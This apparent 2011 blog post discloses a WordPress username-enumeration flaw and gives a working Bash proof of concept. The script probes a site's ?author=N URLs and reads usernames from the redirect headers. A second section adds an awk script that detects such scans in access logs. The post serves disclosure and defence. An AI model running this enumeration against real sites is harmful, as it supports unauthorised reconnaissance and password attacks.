Hi All,

We have recently seen a WordPress username enumeration vulnerability disclosed here: http://seclists.org/fulldisclosure/2011/May/493

Versions affected are: 2.6, 3.1, 3.1.1, 3.1.3

Here I am enclosing a simple PoC which can be run in a Bash shell.
(Note: a PoC in Python is already available for those who are curious.)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
if [ $# -ne 1 ]
then
	echo "Wordpress username enumeration PoC"
	echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
	echo $0 "URL of Website"
else
	count=0
	title=0
	while [ $count -lt 10 ]
	do
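		# Headers only: a redirect (Location header) for ?author=<ID> reveals the author URL
		result=$(curl -I -s --max-time 30 --max-filesize 1 "$1?author=$count" | grep -F 'Location:')
		# The username is the last path component of the redirect target
		name=$(echo "$result" | rev | cut -f2 -d"/" | rev)
		# No Location header means no user was disclosed for this ID
		if [ -n "$result" ]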
		then
			if [ $title == 0 ]
			then
				echo "ID : UserName"
				title=1
			fi
			echo -n $count " : "
			echo $name
		fi
		count=`expr $count + 1`
	done
	if [ $title == 0 ]
	then
		echo "Either this site is not vulnerable or is not using wordpress hosted"
	fi
fi

The code can be downloaded from here: wp_PoC_user_name_enum
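
On the defensive side, the request pattern this PoC produces (one client walking `?author=N` values and receiving redirects) is easy to spot in web server access logs. The following is an added example, not part of the original post; it assumes the Apache/nginx "combined" log format, and the function names, threshold and sample log lines are constructed for illustration.

```shell
#!/bin/bash
# Added example, not part of the original post.
# Assumption: "combined" access log format ($1 = client, $7 = request target, $9 = status).

# Reads an access log on stdin. For each client that requested at least $1
# distinct ?author=<number> values, prints "<client> <IDs probed> <IDs redirected>".
# A 3xx answer is counted as a disclosure because the PoC above reads the
# username from the Location header of the redirect.
find_author_scans() {
	awk -v min="$1" '
	match($7, /[?&]author=[0-9]+/) {
		id = substr($7, RSTART + 8, RLENGTH - 8)   # digits after "?author="
		key = $1 SUBSEP id
		if (!(key in seen)) { seen[key] = 1; probed[$1]++ }
		if ($9 ~ /^3[0-9][0-9]$/ && !(key in hit)) { hit[key] = 1; leaked[$1]++ }
	}
	END {
		for (ip in probed)
			if (probed[ip] >= min) print ip, probed[ip], leaked[ip] + 0
	}' | sort
}

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
sample_log() {
	cat <<'EOF'
203.0.113.5 - - [01/Jun/2011:10:00:00 +0000] "HEAD /?author=0 HTTP/1.1" 200 0 "-" "curl/7.21.0"
203.0.113.5 - - [01/Jun/2011:10:00:01 +0000] "HEAD /?author=1 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.5 - - [01/Jun/2011:10:00:02 +0000] "HEAD /?author=2 HTTP/1.1" 301 0 "-" "curl/7.21.0"
203.0.113.5 - - [01/Jun/2011:10:00:03 +0000] "HEAD /?author=3 HTTP/1.1" 404 0 "-" "curl/7.21.0"
198.51.100.7 - - [01/Jun/2011:10:05:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2011:10:05:09 +0000] "GET /author/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2011:10:06:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
EOF
}

# Flag clients that probed three or more distinct author IDs.
sample_log | find_author_scans 3
```

With the sample data only 203.0.113.5 is reported (four IDs probed, two answered with a redirect); the single-ID visitor stays below the threshold.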


One Comment

  1. protection wordpress username enumeration | Anant Shrivastava : Techno Enthusiast says:

    [...] my last post exploiting username enumeration i have looked deep and found a simple workaround to patch your blog for this vulnerability till [...]
